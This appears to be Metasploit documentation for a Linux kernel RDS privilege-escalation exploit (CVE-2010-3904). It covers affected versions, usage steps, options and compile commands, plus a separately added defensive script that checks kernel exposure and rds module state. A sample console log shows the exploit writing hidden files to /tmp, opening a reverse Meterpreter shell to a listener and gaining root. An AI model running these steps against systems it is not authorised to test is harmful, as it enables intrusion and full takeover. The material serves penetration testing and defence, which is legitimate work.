Description
This module exploits a vulnerability in the rds_page_copy_user function
in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
to execute code as root (CVE-2010-3904).
Vulnerable Application
This module has been tested successfully on:
- Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
- Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic
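An added defender-side check, not part of the module or of Metasploit: it decides from a kernel release string whether the host falls in the range this module targets (2.6.30 through the 2.6.36 release candidates) and reports whether the rds module is currently loaded or blocked from loading. It assumes the standard /proc/modules and /etc/modprobe.d locations and only POSIX sh, cut, sed and grep.

```shell
#!/bin/sh
# Added example: classify a kernel release against the CVE-2010-3904 range
# stated in the module description and report the state of the rds module.

# kernel_in_affected_range RELEASE
#   returns 0 when RELEASE is 2.6.30 .. 2.6.35.x or a 2.6.36-rc* candidate,
#   1 otherwise (2.6.36 final and later carry the fix).
kernel_in_affected_range() {
    rel="$1"
    major=$(printf '%s' "$rel" | cut -d. -f1)
    minor=$(printf '%s' "$rel" | cut -d. -f2)
    # third dotted field may carry a suffix, e.g. "32-21-generic" or "36-rc8"
    third=$(printf '%s' "$rel" | cut -d. -f3)
    patch=$(printf '%s' "$third" | sed 's/[^0-9].*//')
    [ "$major" = 2 ] && [ "$minor" = 6 ] || return 1
    [ -n "$patch" ] || return 1
    if [ "$patch" -ge 30 ] && [ "$patch" -le 35 ]; then
        return 0
    fi
    if [ "$patch" -eq 36 ]; then
        case "$third" in
            36-rc*) return 0 ;;   # release candidates only
        esac
    fi
    return 1
}

# rds_module_state
#   prints "loaded" if rds is in the running kernel, "blocked" if modprobe
#   configuration prevents autoloading it (install rds /bin/true is the
#   usual form), otherwise "available".
rds_module_state() {
    if grep -q '^rds ' /proc/modules 2>/dev/null; then
        echo loaded; return
    fi
    if grep -rqs '^install[[:space:]][[:space:]]*rds[[:space:]]' \
            /etc/modprobe.d /etc/modprobe.conf 2>/dev/null; then
        echo blocked; return
    fi
    echo available
}

main() {
    release=$(uname -r)
    if kernel_in_affected_range "$release"; then
        echo "kernel $release is in the CVE-2010-3904 range; rds module: $(rds_module_state)"
    else
        echo "kernel $release is outside the CVE-2010-3904 range"
    fi
}
main
```

On an affected kernel where rds reports "available", blocking the module from autoloading is the mitigation when the kernel cannot be updated.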
Verification Steps
- Start msfconsole
- Get a session
- use exploit/linux/local/rds_priv_esc
- set SESSION [SESSION]
- check
- run
- You should get a new root session
Options
SESSION
Which session to use; available sessions can be listed with the sessions command.
WritableDir
A writable directory file system path. (default: /tmp)
COMPILE
Options: Auto, True, False (default: Auto)
Whether the exploit should be live compiled with gcc on the target system,
or uploaded as a pre-compiled binary.
Auto will first determine if gcc is installed to compile live on the system,
and fall back to uploading a pre-compiled binary.
Compiled Executables
The module makes use of two pre-compiled exploit executables (rds.x86 and rds.x64),
to be used when gcc is not available on the target host for live compiling, or when
COMPILE is set to False.
The executables were cross-compiled with musl-cross:
./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c
Scenarios
msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.149
OS : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >